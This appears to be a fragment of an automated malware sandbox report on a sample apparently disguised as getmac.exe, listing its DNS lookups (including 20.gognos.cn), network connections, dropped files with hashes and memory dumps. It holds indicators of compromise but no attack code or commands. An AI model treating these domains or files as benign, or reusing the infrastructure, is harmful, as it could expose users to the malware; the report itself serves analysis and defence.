      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response

      117.27.246.96
      119.36.90.164
      36.143.236.7
      36.248.38.100
      111.13.153.152
      111.48.138.18
      111.206.23.199
      112.50.95.96

    • 8.8.8.8:53
      101.14.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      101.14.18.104.in-addr.arpa

    • 8.8.8.8:53
      101.15.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      101.15.18.104.in-addr.arpa

    • 8.8.8.8:53
      96.246.27.117.in-addr.arpa
      dns
      72 B
       125 B
       1
      1

      DNS Request

      96.246.27.117.in-addr.arpa

    • 234.2.2.2:13265
      getmac.exe
      138 B
       3
    • 233.123.112.211:41725
      getmac.exe
      184 B
       2
    • 8.8.8.8:53
      2.2.2.234.in-addr.arpa
      dns
      68 B
       125 B
       1
      1

      DNS Request

      2.2.2.234.in-addr.arpa

    • 8.8.8.8:53
      211.112.123.233.in-addr.arpa
      dns
      74 B
       131 B
       1
      1

      DNS Request

      211.112.123.233.in-addr.arpa

    • 255.255.255.255:1281
      getmac.exe
      60 B
       1
    • 8.8.8.8:53
      157.123.68.40.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      157.123.68.40.in-addr.arpa

    • 8.8.8.8:53
      171.39.242.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      171.39.242.20.in-addr.arpa

    • 8.8.8.8:53
      59.128.231.4.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      59.128.231.4.in-addr.arpa

    • 8.8.8.8:53
      20.gognos.cn
      dns
      getmac.exe
      116 B
       148 B
       2
      2

      DNS Request

      20.gognos.cn

      DNS Request

      20.gognos.cn

      DNS Response

      222.173.195.26

      DNS Response

      222.173.195.26

    • 8.8.8.8:53
      126.179.238.8.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      126.179.238.8.in-addr.arpa

    • 8.8.8.8:53
      26.195.173.222.in-addr.arpa
      dns
      146 B
       262 B
       2
      2

      DNS Request

      26.195.173.222.in-addr.arpa

      DNS Request

      26.195.173.222.in-addr.arpa

    • 255.255.255.255:1281
      getmac.exe
      60 B
       1
    • 255.255.255.255:1281
      getmac.exe
      60 B
       1

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\getmac.exe
      Filesize

      88KB

      MD5

      7d4b72dff5b8e98dd1351a401e402c33

      SHA1

      40810fb6eee8856b1884ecb528c88b97e447c5d8

      SHA256

      467ce33b5145c6e71499f32139f14d81b47c38f11dca26b330367add263dba12

      SHA512

      5a26e5e22ad1005e67f6b66187df4e6f75f1b611b2c8d615af34bd61e94fd48fc64b606e7c43d608d112096c7bbaa8fddfc8a9acb603ab137e71d85783b98fd5

      Download Submit

    • C:\Program Files\getmac.exe
      Filesize

      88KB

      MD5

      7d4b72dff5b8e98dd1351a401e402c33

      SHA1

      40810fb6eee8856b1884ecb528c88b97e447c5d8

      SHA256

      467ce33b5145c6e71499f32139f14d81b47c38f11dca26b330367add263dba12

      SHA512

      5a26e5e22ad1005e67f6b66187df4e6f75f1b611b2c8d615af34bd61e94fd48fc64b606e7c43d608d112096c7bbaa8fddfc8a9acb603ab137e71d85783b98fd5

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\834a700f.tmp
      Filesize

      11.6MB

      MD5

      5244c87dbafa1f764b258766005dea73

      SHA1

      84cb8b4fb3e0910cfecfb31b6fa54c16d940e703

      SHA256

      077035f93ddc3ac5a8b5631d43826baf7722256eb1c4716b3c2567f07379bc40

      SHA512

      54d64d32e73e2752cdf9a110db17ad64574eb072df0ed0dc34a7e4bc469c03aa79ef7d45465e279ef85d5fc6b33a1b750b181476cdea7ea98898ddba9aa60438

      Download Submit

    • C:\Windows\SysWOW64\eda5f540
      Filesize

      271KB

      MD5

      52f24bd4d3d617057481e5d25f34fbed

      SHA1

      18328882cc8204ab3842f4264983a98963f8b11e

      SHA256

      b1874596a33641cd412dd227c45f9c2b38208ace88af44af95cd8e402cac705c

      SHA512

      033f6b83f0a6446fd35cccffc2430375014ff11e75b8969e3f8a7b0e384b653dba93a1e16bf48907d5e1d840261388c4048b8e64e0fd7ba96fece67c65c096cf

      Download Submit

    • C:\Windows\SysWOW64\eda5f540
      Filesize

      271KB

      MD5

      52f24bd4d3d617057481e5d25f34fbed

      SHA1

      18328882cc8204ab3842f4264983a98963f8b11e

      SHA256

      b1874596a33641cd412dd227c45f9c2b38208ace88af44af95cd8e402cac705c

      SHA512

      033f6b83f0a6446fd35cccffc2430375014ff11e75b8969e3f8a7b0e384b653dba93a1e16bf48907d5e1d840261388c4048b8e64e0fd7ba96fece67c65c096cf

      Download Submit

    • memory/608-29-0x0000012A5D220000-0x0000012A5D223000-memory.dmp

      Filesize

      12KB

      Download

    • memory/608-71-0x0000012A5D270000-0x0000012A5D271000-memory.dmp

      Filesize

      4KB

      Download

    • memory/608-32-0x0000012A5D230000-0x0000012A5D258000-memory.dmp

      Filesize

      160KB

      Download

    • memory/608-31-0x0000012A5D270000-0x0000012A5D271000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1404-9-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

      Download

    • memory/1404-0-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

      Download

    • memory/1404-39-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

      Download

    • memory/1836-63-0x00007FF9FCB30000-0x00007FF9FCB40000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-80-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-85-0x000001FE413A0000-0x000001FE413A2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1836-26-0x00007FF9FCB30000-0x00007FF9FCB40000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-23-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/1836-22-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/1836-84-0x000001FE423C0000-0x000001FE42585000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/1836-82-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-81-0x000001FE413B0000-0x000001FE413B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-25-0x000001FE3FA20000-0x000001FE3FA21000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-65-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/1836-79-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-70-0x000001FE3FA20000-0x000001FE3FA21000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-78-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-72-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-73-0x000001FE41390000-0x000001FE41391000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-74-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-75-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1836-76-0x000001FE423C0000-0x000001FE42585000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/1836-77-0x000001FE413A0000-0x000001FE413A2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2256-69-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

      Download

    • memory/2256-64-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

      Download

    • memory/2256-27-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

      Download

    • memory/2256-3-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

      Download

    • memory/3212-13-0x0000000002600000-0x0000000002603000-memory.dmp

      Filesize

      12KB

      Download

    • memory/3212-20-0x0000000006C70000-0x0000000006D69000-memory.dmp

      Filesize

      996KB

      Download

    • memory/3212-50-0x00000000077B0000-0x00000000077B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3212-11-0x0000000002600000-0x0000000002603000-memory.dmp

      Filesize

      12KB

      Download

    • memory/3212-21-0x00000000077B0000-0x00000000077B1000-memory.dmp

      Filesize

      4KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.